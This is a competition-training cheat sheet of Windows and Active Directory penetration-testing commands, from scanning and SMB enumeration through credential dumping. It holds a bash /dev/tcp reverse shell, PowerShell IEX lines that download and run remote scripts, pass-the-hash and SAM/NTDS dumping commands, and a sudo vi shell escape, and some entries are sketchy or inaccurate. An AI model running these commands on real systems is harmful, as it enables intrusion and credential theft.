CPTC Training

Notes from training as a Windows specialist for the Collegiate Penetration Testing Competition. The contents of this post are provided for educational purposes only.

Tools

Network enumeration

Nmap

nmap -A 10.0.0.1
  • Flags
    • -sC runs the default scripts.
    • -sS sends only a TCP SYN packet and never completes the handshake, which allows for a faster, less noisy scan.
    • -sV tries to find the version of any running services/OS.
    • -Pn skips host discovery (no ping) and goes straight to the TCP SYN probes.
    • -oA writes the results in all output formats to files.
  • States
    • Open: a TCP SYN/ACK is received, so a service is listening on the port.
    • Closed: a TCP RST is received in reply to the SYN, which means no service is listening on the port.
    • Filtered: no response was received from the port.
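As an added example (not part of the original notes), a small Python parser for the greppable .gnmap file that -oA writes, which pulls each port's open/closed/filtered state out per host so a scope can be summarised quickly; the scan output below is constructed.

```python
import re
from dataclasses import dataclass

# Constructed sample of the greppable (.gnmap) file that nmap -oA writes.
# Fields are tab-separated; a port entry is port/state/proto/owner/service/
# rpcinfo/version/ (nmap writes '/' inside version strings as '|').
SAMPLE_GNMAP = (
    "# Nmap 7.80 scan initiated Thu Nov  7 10:00:00 2019 as: nmap -sS -sV -Pn -oA lab 10.0.0.0/30\n"
    "Host: 10.0.0.1 (dc01.lab.local)\tStatus: Up\n"
    "Host: 10.0.0.1 (dc01.lab.local)\tPorts: "
    "88/open/tcp//kerberos-sec//Microsoft Windows Kerberos/, "
    "445/open/tcp//microsoft-ds//Windows Server 2016 microsoft-ds/, "
    "3389/filtered/tcp//ms-wbt-server///, "
    "8080/closed/tcp//http-proxy///\tIgnored State: closed (996)\n"
    "Host: 10.0.0.2 ()\tPorts: 445/open/tcp//microsoft-ds///\tIgnored State: filtered (999)\n"
    "# Nmap done at Thu Nov  7 10:00:09 2019 -- 4 IP addresses (2 hosts up) scanned\n"
)

@dataclass
class PortRecord:
    host: str
    hostname: str
    port: int
    state: str  # open, closed or filtered, as defined above
    proto: str
    service: str
    version: str

def parse_gnmap(text):
    """Return one PortRecord per port entry in greppable nmap output."""
    records = []
    for line in text.splitlines():
        # Comment lines and the bare 'Status: Up' lines carry no port data.
        if line.startswith("#") or "\tPorts: " not in line:
            continue
        fields = dict(f.split(": ", 1) for f in line.split("\t"))
        ip, hostname = re.match(r"(\S+) \((.*)\)", fields["Host"]).groups()
        for entry in fields["Ports"].split(", "):
            p = entry.split("/")
            records.append(PortRecord(ip, hostname, int(p[0]), p[1], p[2], p[4], p[6]))
    return records

def open_ports(records, host):
    """Sorted open ports on one host."""
    return sorted(r.port for r in records if r.host == host and r.state == "open")

def hosts_exposing(records, port):
    """Hosts with the given port open, e.g. every SMB listener in scope."""
    return sorted({r.host for r in records if r.port == port and r.state == "open"})
```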

Bloodhound

BloodHound is useful for visualizing Active Directory networks.

Working with smbclient

Useful for interacting with SMB, a network file-sharing protocol.

smbclient -L //10.10.10.1

Mount an SMB share

mkdir -p /mnt/smb
mount -t cifs //10.10.10.1/Backups /mnt/smb

smbmap attempts to write a file to the mounted share, which is noisy.

smbmap -u example -H 10.10.10.1

Download the contents of an anonymous FTP share

wget -m --no-passive ftp://anonymous:anonymous@10.10.10.1

Reading a Microsoft Outlook email folder (.pst)

readpst example.pst

Dirbuster

dirbuster, using the directory lists under /usr/share/wordlists/dirbuster/

Joining a hardwired Ethernet network with Kali

ip addr add 10.0.0.104/16 dev eth0
route add default gw 10.0.0.1 eth0

Gobuster

gobuster -u http://10.10.10.1 -w /usr/share/wordlists/dirbuster/...

Search for .aspx files

gobuster -u http://10.0.0.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx -o gobuster-default-aspx.log

Enum4linux

Enumerates users over SMB on Windows hosts.

enum4linux -p 'example' -R 1000-1150 10.0.0.1

Remote desktop

Allows you to remote desktop into a Windows box.

rdesktop 10.0.0.1

Exploitation

searchsploit

searchsploit magento
searchsploit -x /exploits/php/webapps/32808.txt

Bash & Netcat reverse shell

"bash -c 'bash -i >& /dev/tcp/10.10.14.3/9001 0>&1'"
nc -lvnp 9001

Responder

mDNS poisoning

responder -I eth0 --wpad

Privilege escalation through sudo vi

sudo -l
sudo vi /var/www/html/example
:!/bin/bash

mitm6

mitm6 -d lab.local

Cracking password-protected zip files

zip2john test.zip > test.hash
john test.hash --wordlist=/usr/share/wordlists/...

Dumping an Access (.mdb) database

apt-get install mdbtools
mdb-sql example.mdb
> list tables
> go
mkdir -p tables
for i in $(mdb-tables example.mdb); do mdb-export example.mdb "$i" > "tables/$i"; done

Kerberoasting

CrackMapExec

apt-get install crackmapexec

Get local account hashes (SAM)

cme smb -u sanchez -p password -d Domain 10.0.0.1 --sam

Get the hashes of every account in the domain (NTDS via DRSUAPI)

cme smb -u sanchez -p password -d Domain 10.0.0.1 --ntds drsuapi

Psexec

Hydra

Brute-forces logins to services.

LanMan (LM)

Legacy Windows password hash storage.

Switch traffic attack

Flood the switch with ARP requests so that it fails over into hub mode.

IIS

Upload an .aspx config for RCE.

Post exploitation

Get Windows admin password hashes

Windows/System32/config/SAM: contains the user password hashes.

Windows/System32/config/SYSTEM: holds the boot key needed to decrypt them.

impacket-secretsdump -sam SAM -system SYSTEM local

Perform pass the hash with smbmap

smbmap -u l3mje -p '<password hash>' -H 10.10.10.1

nbtstat (NetBIOS name table)

nbtstat -a <hostname>

Windows: check the local administrators

net localgroup administrators

Privilege escalation

JAWS (Just Another Windows Script), a PowerShell enumeration script:

IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/jaws-enum.ps1')

Using the nishang reverse TCP shell

Run on the box hosting the nishang PowerShell script:

python -m SimpleHTTPServer

Run on the box you want the reverse shell from:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.1:8000/nishang.ps1')"

Security identifier (SID)

  • 501 admin
  • 100 > user accounts

List services

Listening services can be listed with netstat.

Wmic

  • Useful for querying information.
  • Stealthy, since it is used by legitimate applications.

pth-wmic -U 'domain\username'%'Asdf1234' //10.128.192.84 "select * from Win32_LoggedOnUser"

System info

pth-wmic -U 'domain\username'%'Asdf1234' //10.128.192.84 "select Buildtype from win32_operatingsystem"

Windows

Login

  • User ID
  • Password
  • Domain

NTLM

NTLMv1

Passwords are easier to crack, and pass the hash works.

NTLMv2

Can't pass the hash.

Event log

Sources

Last updated: 2019-11-07 Thu
